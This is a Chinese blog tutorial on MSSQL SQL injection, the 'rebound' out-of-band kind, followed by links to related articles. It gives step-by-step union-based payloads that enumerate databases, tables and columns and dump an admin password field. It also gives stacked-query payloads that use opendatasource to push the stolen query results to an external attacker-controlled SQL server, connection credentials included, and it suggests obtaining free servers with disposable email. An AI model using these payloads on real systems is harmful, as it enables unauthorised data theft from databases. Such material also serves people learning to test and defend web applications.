web安全入门(第五章-4)反弹注入

最新推荐文章于 2022-11-21 19:39:04 发布
最新推荐文章于 2022-11-21 19:39:04 发布
阅读量494 收藏 1
点赞数
分类专栏: 安全入门 文章标签: 数据库 sql 后端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YINZHE_/article/details/106491958
版权

一、MSSQL反弹注入使用场景

	0,MSSQL数据库就是Sql server数据库
	1,前言
		MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,
		存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖独特的攻击思路
	2,遇到问题
		明明有注入点却无法进行注入,工具攻击速度也是异常缓慢,错误提示信息关闭,
		无法返回注入结果,这些都是在注入攻击中常常遇到的问题。为例解决以上的疑难杂症,
		我们来学习反弹注入,反弹注入则依靠opendatasource函数支持
	3,简单总结
		反弹注入就是利用opendatasource函数,将当前数据库中的查询结果发送给另一个数据库中

二、快速搭建一个MSSQL环境

1,利用十分钟邮箱(例如:bccto.me)在香港云上白嫖一个服务器(webweb.com)
2,根据目标数据库,建立相同类型数据库,建立表(表名随意),字段(名字随意,字段一定相同)

三、MSSQL反弹注入语句解析

MSSQL于MYSQL不一样
联合查询为例:
	首先猜字段
	然后联合查询,要写union all
	然后猜输出点要使用NULL去填充


1.	例如:url id=1	
			id=1' union all select null,null,null from news -- qwe
			提一下:
					~union后注意有个 all
					~select后,不可以加1,2,3,也不是不可以,这的数据类型要一致。
						因为一般来说,我们都不知道,所以写null,即无类型
						之后,可以用asd来测试是不是字符,这样以此来测试
2,直接在sql server数据库中查询
	查库:	select name from dbo.sysdatabases	
			或者:select *from dbo.sysdatabases			
					//name是库默认属性
					//查询所有库,查出来有默认库,
	查表:	select *from dbo.sysobjects where xtype='U'	
					//稍微改一点关键词,注意增加xtype判断,后边的‘U’是用户的意思
					//代表查询用户创建的表,不然会查出很多表,
	查字段:select *from dbo.syscolumns where id=111

	id是SQL server表默认的字段,类似的还有name

显错注入

		判断是否存在注入
		输入and1=1 页面报错
		加一个’ 给他闭合
	
	查字段数
		‘ order by 3 页面正常
		‘ order by 4 页面错误 说明有3个字段
	MSSQL和MYSQL的区别
		联合查询最好加 all 发现加了all还是没有数据输出  mssql对语句比较严格,最好在填充位填 null 空的意思 页面正常,说明语法是对的

	找输出点
	先试试在第一个地方输入一个5
	页面出现一个5
		在第二个显错位输入字符串’a’ 页面正常
		在第三个显错位输入字符串’a’ 页面正常
	说明第一个只能输数字,因为union select他的核心在于要求两边的查询语句的结果的字段的数量和类型相同

	找到输出点,查询库名
	union all select dbid,name,null from master.dbo.sysdatabases

	查询表名
	union all select id,name,null from dbo.sysobjects where xtype='U'

	爆字段
	union all select null,name,null from dbo.syscolumns where id=1977058079

	爆内容
	union all select null,passwd,null from admin

反弹注入

	判断是否存在sql注入  ‘ and 1=1 -- qwe页面正常  ‘and 1=2 -- qwe页面错误 说名存在sql注入

	‘ order by 3 页面正常 order by 4 页面错误,说明存在三个字段
	在url栏中执行插入  页面正确,说明插入成功

	爆表名
	'; insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14D9383_yz_admin;pwd=12345678;database=DB_14D9383_yz').DB_14D9383_yz.dbo.aa select id,name,null,null from sysobjects where xtype='u'

	爆字段
	'; insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14D9383_yz_admin;pwd=12345678;database=DB_14D9383_yz').DB_14D9383_yz.dbo.aa select id,name,null,null from syscolumns where id=1977058079

	'; insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14D9383_yz_admin;pwd=12345678;database=DB_14D9383_yz').DB_14D9383_yz.dbo.aa select *from admin

	select *from aa  从aa表中查询所有内容

	语法:
	opendatasource(provider_name,init_string)
	provider_name:注册为用于访问数据源的OLEDB提供程序的UPROGID的名称,MSSQL的名称为SQLOLEDB
	init_string:
		连接字符串
		链接地址、端口、用户名、密码、数据库名
	'; insert into opendatasource('sqloledb','server=服务器地址;uid=用户;pwd=密码;database=库名').库名.dbo.表名 select * from admin
YINZHE_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
MSSQL注入反弹注入
MSB_WLAQ的博客
10-06 409
MSSQL反弹注入原理 依靠 opendatasource 函数,把查询出的数据发送到MSSQL服务器上。 MSSQL反弹注入使用场景 用香港云快速搭建一个MSSQL环境 可以用临时邮箱注册免费的试用60天。 免费60天的试用,过期了就换个邮箱。 1.猜数据时为什么不能用数字 根据了MSSQL的特性,虽然不能用数字但可用null和字母填充 2.MSSQL有系统自带库吗 有 为master.dbo.sysdatabase 3.反弹注入满足的条件 能否堆叠查询,...
MSSQL注入——反弹注入
m0_55854679的博客
02-18 893
文章目录MSSQLSQL server】反弹注入使用场景快速搭建MSSQL环境MSSQL数据库反弹注入语句分析OPENDATASOURCE函数练习第一种方法——联合查询注入第二种方法——反弹注入+堆叠注入 MSSQLSQL server】反弹注入使用场景 与mysql大同小异,注入思路相同,但用到的函数等不同。 反弹注入 => 注入的手法(偏门)oob => 把查询到的数据插入外部的数据库(公网ip),反弹注入实际就是把查询出来的数据发送到我们的MSSQL服务器上。 快速搭建MSSQL
WebAPI入门指南-闲话安全
02-26
WebAPI入门指南有些朋友回复问了些安全方面的问题,安全方面可以写的东西实在太多了,这里尽量围绕着WebAPI的安全性来展开,介绍一些安全的基本概念,常见安全隐患、相关的防御技巧以及WebAPI提供的安全机制。先引用下wikipedia信息安全的定义:即保护信息免受未经授权的进入、使用、披露、破坏、修改、检视、记录及销毁,从而保证数据的机密性(Confidentiality)、完整性(Integrity)和可靠性(Availability)。机密性和完整性都很好理解,可靠性作为信息安全的一个重要原则这里特别解释一下,即访问信息的时候保证可以访问的到,有一种攻击方式叫DOS/DDOS,即拒绝服
第5章 5.WEB安全性测试--SQL注入一.mp4
05-08
第5章 5.WEB安全性测试--SQL注入一.mp4
管理信息系统第五版黄梯云第4章-Web开发的基本技术.ppt
11-15
管理信息系统第五版黄梯云第4章-Web开发的基本技术.ppt
MSSQL反弹注入
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-17 487
MSSSQL注入——反弹注入 我们首先先回顾一下MSSQL普通的显错注入(毕竟MSSQL显错注入和MYSQL不太一样) 我这里还是联合传为例子,首先猜字段,然后联合查询,记住要写union all,然后猜输出点,要使用NULL去填充,注释只有 – + select name from dbo.sysdatabases 查询系统库 sysobjects 查询系统表 (xtype=‘U’) syscolumns 字段 (id= ) 指定sysobjects库中表名对应id 先尝试显错注入 ‘ and o
MS SQL数据库——反弹注入
m0_46304840的博客
03-12 258
前言 正文 0x01 查表 0x02 查字段 0x03 查数据 0x04 总结 文末 前言 ms sql还有一些盲注啥的,就不去深入的去搞了,就再写一篇反弹注入 然而这边我们可以去搞个虚拟空间:香港云 涉及到的一个函数opendatasource() 可以看成open,data,source三个单词 语法:opendatasource(provider_name,ini...
18、注入篇--反弹注入(MSSQL
WX公众号-小白学安全
04-10 729
MSSQL MSSQL基础 MSSQL是指微软的SQLServer的数据库服务器 每个库都会自带有sysobjects表,其中有三个字段 name 当前数据库下的所有表名 id 相当于表名的标识 xtype 字段 中 U 代表用户创建的表名,S代表系统创建的 每个库都会自带有syscolumns表,其中有两个字段 name 每个表的字段名 id 对应sysobjects表中id字段 反弹注入 原理 原理:将目标站点中查询到的数据结果 传到攻击者的数据库注入条件
mssql反弹注入
笔墨稠思
11-25 372
1.反弹注入原理 通过opendatasource()将查询到的数据发送到mssql服务器 2.反弹注入使用条件 是否存在堆叠注入 注意事项: 1.mssql 对字段的数据类型要求严格,测试回显点时,可以使用null来代替字段,之后对null进行替换,找出争取的数据类型 2.在使用联合查询时,推荐使用union all 进行查询 3.之前在mysql中查询表和字段时使用的系统自带库 information_schema在mssql中也存在,仍然可以使用,也可以使用其系统自带表,sysobjects查询表名,
数据库注入学习笔记3---MSSQ注入(反弹注入)
qq_41759633的博客
08-07 533
引:MSSQL注射攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖的攻击思路,而反弹注入技术需要依靠opendatasource函数支持 opendatasource:‘使用opendatasource函数将当前数据库中查询的结果发送到另一数据库服务器中’ 攻击过程: 攻击前准备: 首先需要在攻击者主机的SQL server 2000...
第8章 8.WEB安全性测试--SQL注入四.mp4
05-08
第8章 8.WEB安全性测试--SQL注入四.mp4
第7章 7.WEB安全性测试--SQL注入三.mp4
05-08
第7章 7.WEB安全性测试--SQL注入三.mp4
WEB安全——常见漏洞
ershuiyan的博客
11-21 559
sql注入,xss,crsf,ssrf,文件上传。
五、注入(4)MSsql注入——反弹注入
weixin_45540609的博客
04-21 189
MSSQL反弹注入 当明明是注入点却无法进行注入注入工具猜解速度缓慢,错误提示信息关闭,无法返回注入结果等。这时比较好的方法就是使用反弹注入,需要依靠opendatasource函数支持。 反弹注入:目标站点把查询数据的结果插入到黑客的数据库里 条件: 1、网络通畅(需要公网ip) 2、自己的MSSQL数据库 可以申请一个免费的虚拟空间,虚拟空间中开启MSSQL然后直接使用,可以免去MSSQL安装环境且不需要特意购置云服务器来获取一个公网IP。 香港云 http://www.webweb..
网络安全入门到精通(第六章-4)MSsql注入 —— 反弹注入
划水的小白白
02-05 2007
本文内容: ~MSSQL反弹注入使用场景 ~快速搭建一个MSSQL环境(骚姿势) ~MSSQL反弹注入语句解析 ~MSSQL实战注意
mysql反弹注入平台_MSSQL注入--反弹注入
weixin_30284287的博客
02-11 198
明明是sql注入的点,却无法进行注入,注射工具拆解的速度异常的缓慢,错误提示信息关闭,无法返回注入的结果,这个时候你便可以尝试使用反弹注入反弹注入需要依赖于函数opendatasource的支持,将当前数据库中的查询结果发送到另一数据库服务器中。判断数据库类型and exists (select * from sysobjects)--返回正常为mssql(也名sql server)and ex...
oralce反弹注入攻击实战
chuancuili8770的博客
01-14 385
作者:BlAck.Eagle 声明:严禁按照本文进行攻击等非法操作,后果自负,本文旨在信息安全技术研究 估计大家读了《oracle注入实战之渗透联通》一文之后都会为之一震,但是笔者不知道读者朋友有没有遇到过和笔者相似的情况,就是用union select语句爆全部的表的时候,根本...
SQL注入(MSSQL反弹注入)---zkaq
weixin_38237216的博客
04-11 1495
1.概念 1.反弹注入:是一种把查询到的数据插入外部的数据库的方法 2.mysqlSql Server的区别(不同的函数、不同的系统自带库) mysql系统自带库:table_name,columns_name,information_schema等 mysql独有的语法limit MSSQL:sysconstraints,syssegments等 sysobjects:查询系统表 (xtype=‘U’),'U’代表用户自创的类型;'S’代表系统自带的类型 syscolumns 字段 (id= ) 指定
文件上传漏洞总结
Yzz_的博客
06-02 2682
文件上传 1.前后端检测:使用BurpSuite抓包,有数据包为后端,无数据包为前端。 文件马成功的两个核心条件: 1.成功上传图片马到服务器,且图片马中的恶意代码保存完整 2.文件马被php解析器(asp解析器)解析 2.分类: PHP: 前端检测: 白名单:允许上传什么。 黑名单:不允许上传什么。 绕过: 1.关闭js。 2.抓包修改。 后端检测: 白名单:允许上传什么。 00截断: %00和00就是代表一个结束符。
[第一章 web入门]sql注入-1
最新发布
06-28
SQL注入是一种常见的攻击方式,攻击者通过在Web应用程序中注入恶意的SQL语句,从而获取敏感信息或者执行非法操作。SQL注入攻击的原理是利用Web应用程序没有对用户输入的数据进行充分的过滤和验证,从而导致恶意SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值